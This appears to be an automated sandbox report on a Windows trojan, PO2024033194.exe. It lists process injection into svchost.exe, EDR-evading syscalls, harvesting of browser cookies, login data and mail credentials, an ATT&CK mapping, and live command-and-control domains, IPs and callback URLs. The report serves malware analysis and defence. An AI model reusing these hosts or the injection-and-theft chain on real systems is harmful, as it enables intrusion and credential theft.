            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03232F12 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0326CF1F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0325AF69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0325AF69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0041F250 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtOpenKeyEx: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtQueryInformationToken: Direct from: 0x77382CAC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtOpenKeyEx: Direct from: 0x77382B9C
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtQueryValueKey: Direct from: 0x77382BEC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtDeviceIoControlFile: Direct from: 0x77382AEC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtCreateFile: Direct from: 0x77382FEC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtOpenFile: Direct from: 0x77382DCC
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; NtProtectVirtualMemory: Direct from: 0x77377B2E
            Source: C:\Users\user\Desktop\PO2024033194.exe; Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe; Section loaded: NULL target: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe protection: read write
            Source: C:\Windows\SysWOW64\replace.exe; Section loaded: NULL target: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\replace.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\replace.exe; Thread register set: target process: 6080
            Source: C:\Users\user\Desktop\PO2024033194.exe; Memory written: C:\Windows\SysWOW64\svchost.exe base: 431008
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00436CD7 LogonUserW
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
            Source: C:\Users\user\Desktop\PO2024033194.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2024033194.exe"
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: drBzjAnGBElC.exe, 00000003.00000000.2188787985.0000000001450000.00000002.00000001.00040000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000002.4625215536.0000000001450000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: IProgram Manager
            Source: PO2024033194.exe, drBzjAnGBElC.exe, 00000003.00000000.2188787985.0000000001450000.00000002.00000001.00040000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000002.4625215536.0000000001450000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: drBzjAnGBElC.exe, 00000003.00000000.2188787985.0000000001450000.00000002.00000001.00040000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000002.4625215536.0000000001450000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: drBzjAnGBElC.exe, 00000003.00000000.2188787985.0000000001450000.00000002.00000001.00040000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000002.4625215536.0000000001450000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: PO2024033194.exe; Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00472C3F GetUserNameW
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

            Stealing of Sensitive Information

            Source: Yara match; File source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\replace.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\replace.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\replace.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\replace.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\replace.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\replace.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\replace.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\replace.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\replace.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: PO2024033194.exe; Binary or memory string: WIN_XP
            Source: PO2024033194.exe; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: PO2024033194.exe; Binary or memory string: WIN_XPe
            Source: PO2024033194.exe; Binary or memory string: WIN_VISTA
            Source: PO2024033194.exe; Binary or memory string: WIN_7
            Source: PO2024033194.exe; Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match; File source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
            Mitre Att&ck Matrix

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Native API (2); Command and Scripting Interpreter (2); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (312); Startup Items; Scheduled Task/Job; At
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (312)
            Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (16); Security Software Discovery (141); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            Behavior Graph ID: 1515416; Sample: PO2024033194.exe; Startdate: 22/09/2024; Architecture: WINDOWS; Score: 100
            Contacted domains: www.sterkus.xyz; www.rtpngk.xyz; 25 other IPs or domains
            Sample signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures
            www.rtpngk.xyz: Performs DNS queries to domains with low reputation
            Process tree:
            PO2024033194.exe (started)
                Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
                svchost.exe (started)
                    Signatures: Maps a DLL or memory area into another process
                    drBzjAnGBElC.exe (injected)
                        Network: www.sterkus.xyz 209.74.95.29, ports 49735, 49736, 49737, MULTIBAND-NEWHOPEUS, United States; www.moritynomxd.xyz 172.81.61.224, ports 49718, 49787, 80, ESITEDUS, United States; 11 other IPs or domains
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                        replace.exe (started)
                            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                            firefox.exe (started)

            Source: PO2024033194.exe; Detection: 68%; Scanner: ReversingLabs; Label: Win32.Trojan.Autoitinject
            Source: PO2024033194.exe; Detection: 100%; Scanner: Avira; Label: HEUR/AGEN.1321685
            Source: PO2024033194.exe; Detection: 100%; Scanner: Joe Sandbox ML
            No Antivirus matches
            https://www.reg.ru/domain/new/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
            http://www.sppsuperplast.online/becc/0%Avira URL Cloudsafe
            https://cdn.jsdelivr.net/npm/bootstrap-icons0%Avira URL Cloudsafe
            http://www.sterkus.xyz/ha8h/0%Avira URL Cloudsafe
            http://www.deefbank.net/1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU=&azq=fdKL0%Avira URL Cloudsafe
            http://www.deefbank.net/1y6y/0%Avira URL Cloudsafe
            https://t.me/AG099990%Avira URL Cloudsafe
            http://www.syncnodex.net/xx1z/?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL0%Avira URL Cloudsafe
            https://www.reg.ru/hosting/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_land0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.les-massage.online&utm_medium=parking&u0%Avira URL Cloudsafe
            http://www.syncnodex.net/xx1z/0%Avira URL Cloudsafe
            http://www.kovallo.cloud/kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL0%Avira URL Cloudsafe
            http://www.asociacia.online/bf6k/?i4fTbV=WmuOVz+RC0WxuKvAKjLazsuJSut05UnIYH9cvZCoa2K6/WBiXNRHwXvjS8aBoIFx3RUgrEeQYXBh1DGCvEwoQM3mycAsC54rxjYGxDtBM8eA6E3stZW6KS9LpBS51Lfr66nx40w=&azq=fdKL0%Avira URL Cloudsafe
            https://www.rtpngk.xyz/876i/?i4fTbV=Kmyw0%Avira URL Cloudsafe
            http://www.cc101.pro/4hfb/0%Avira URL Cloudsafe
            https://htmlcodex.com/credit-removal0%Avira URL Cloudsafe
            http://www.les-massage.online/74ou/0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pakmartcentral.shop | 84.32.84.32 | true | false | | unknown
tracy.club | 3.33.130.190 | true | false | | unknown
warriorsyndrome.net | 3.33.130.190 | true | false | | unknown
wcq24.top | 154.23.184.240 | true | false | | unknown
asociacia.online | 81.2.196.19 | true | false | | unknown
www.moritynomxd.xyz | 172.81.61.224 | true | true | | unknown
www.syncnodex.net | 15.197.172.60 | true | false | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | false | | unknown
www.sterkus.xyz | 209.74.95.29 | true | true | | unknown
www.cc101.pro | 188.114.97.3 | true | false | | unknown
galaxyslot88rtp.lat | 46.17.172.49 | true | false | | unknown
www.rtpngk.xyz | 188.114.96.3 | true | true | | unknown
kovallo.cloud | 81.2.196.19 | true | false | | unknown
ghs.googlehosted.com | 142.250.185.115 | true | false | | unknown
ks1x7i.vip | 3.33.130.190 | true | false | | unknown
www.les-massage.online | 194.58.112.174 | true | false | | unknown
www.warriorsyndrome.net | unknown | unknown | true | | unknown
www.deefbank.net | unknown | unknown | true | | unknown
www.kovallo.cloud | unknown | unknown | true | | unknown
www.pakmartcentral.shop | unknown | unknown | true | | unknown
www.wcq24.top | unknown | unknown | true | | unknown
www.galaxyslot88rtp.lat | unknown | unknown | true | | unknown
www.asociacia.online | unknown | unknown | true | | unknown
www.tracy.club | unknown | unknown | true | | unknown
www.sppsuperplast.online | unknown | unknown | true | | unknown
www.ks1x7i.vip | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.tracy.club/fl4z/?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKL | false | Avira URL Cloud: safe | unknown
http://www.ks1x7i.vip/uxh9/?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI= | false | Avira URL Cloud: safe | unknown
